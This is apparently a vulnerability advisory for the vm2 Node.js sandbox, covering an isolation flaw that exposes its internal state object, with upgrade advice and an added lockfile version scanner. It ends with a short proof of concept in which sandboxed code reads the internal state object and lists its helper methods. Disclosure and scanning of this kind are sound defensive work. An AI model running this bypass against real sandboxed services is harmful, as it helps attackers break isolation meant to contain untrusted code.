Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade vm2 to version 3.11.2 or higher.
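As an added example, not code from Snyk or the vm2 project: a small lockfile check that flags any vm2 entry (including nested copies under other dependencies) whose version is below the fixed release 3.11.2 named above. The semver comparison follows standard precedence rules (a prerelease such as 3.11.2-beta.1 sorts below 3.11.2 and is therefore still reported). The lockfile contents are constructed for the demonstration and do not describe any real project.

```javascript
// Added example (not Snyk's or vm2's code): report vm2 versions below the
// fixed release given on this advisory when scanning a package-lock.json.
const FIXED_VERSION = "3.11.2"; // from the advisory's remediation

// Parse "MAJOR.MINOR.PATCH[-prerelease][+build]" into comparable parts.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$/.exec(v.trim());
  if (!m) throw new Error(`not a semver version: ${v}`);
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] ? m[4].split(".") : null };
}

// Compare two versions by semver precedence: returns -1, 0 or 1.
function compareSemver(a, b) {
  const x = parseSemver(a), y = parseSemver(b);
  for (const k of ["major", "minor", "patch"]) {
    if (x[k] !== y[k]) return x[k] < y[k] ? -1 : 1;
  }
  // A prerelease sorts before the corresponding release version.
  if (x.pre && !y.pre) return -1;
  if (!x.pre && y.pre) return 1;
  if (!x.pre && !y.pre) return 0;
  const n = Math.max(x.pre.length, y.pre.length);
  for (let i = 0; i < n; i++) {
    if (x.pre[i] === undefined) return -1; // shorter prerelease list sorts lower
    if (y.pre[i] === undefined) return 1;
    const xi = /^\d+$/.test(x.pre[i]) ? Number(x.pre[i]) : x.pre[i];
    const yi = /^\d+$/.test(y.pre[i]) ? Number(y.pre[i]) : y.pre[i];
    if (xi === yi) continue;
    if (typeof xi === "number" && typeof yi === "number") return xi < yi ? -1 : 1;
    if (typeof xi === "number") return -1; // numeric identifiers sort below alphanumeric
    if (typeof yi === "number") return 1;
    return xi < yi ? -1 : 1;
  }
  return 0;
}

// True when the installed version predates the fix.
function isAffected(version) {
  return compareSemver(version, FIXED_VERSION) < 0;
}

// Walk the "packages" map of a lockfileVersion 2/3 package-lock.json and
// collect every vm2 entry, nested copies included, with its verdict.
function scanLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "" || !path.endsWith("node_modules/vm2")) continue;
    findings.push({ path, version: entry.version, affected: isAffected(entry.version) });
  }
  return findings;
}

// Constructed sample lockfile for the demonstration; not from a real project.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/vm2": { version: "3.9.19" },
    "node_modules/some-plugin": { version: "2.0.0" },
    "node_modules/some-plugin/node_modules/vm2": { version: "3.11.2" },
  },
};

if (typeof module !== "undefined" && require.main === module) {
  for (const f of scanLockfile(SAMPLE_LOCK)) {
    console.log(`${f.path} ${f.version} -> ${f.affected ? "AFFECTED, upgrade to >= " + FIXED_VERSION : "fixed"}`);
  }
}
```

To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`; the nested-path check matters because a transitive dependency can pin its own older vm2 even when the top-level copy is up to date.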
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Improper Isolation or Compartmentalization through the setupSandboxScript bootstrap in lib/vm.js and lib/setup-sandbox.js. An attacker can read the sandbox’s VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL object by supplying computed property accesses such as globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL'], Reflect.get, descriptor APIs, or own-property enumeration. This exposes the live internal state object to sandboxed code, including helper methods such as handleException and wrapWith, breaking the sandbox’s protection against direct access to vm2 internals and enabling further abuse of those exposed primitives.
Notes: This is a complementary fix for CVE-2026-44003
```javascript
const { VM } = require("vm2");
const vm = new VM();

// Access internal state (bypassed — no catch/import/async keywords)
const result = vm.run(`
  var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
  Object.keys(x).join(",")
`);
console.log(result); // "wrapWith,handleException,import"

// Control test — blocked when catch keyword is present
try {
  vm.run(`
    try {
      var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
    } catch(e) { e.message }
  `);
} catch(e) {
  console.log(e.message); // "Use of internal vm2 state variable"
}
```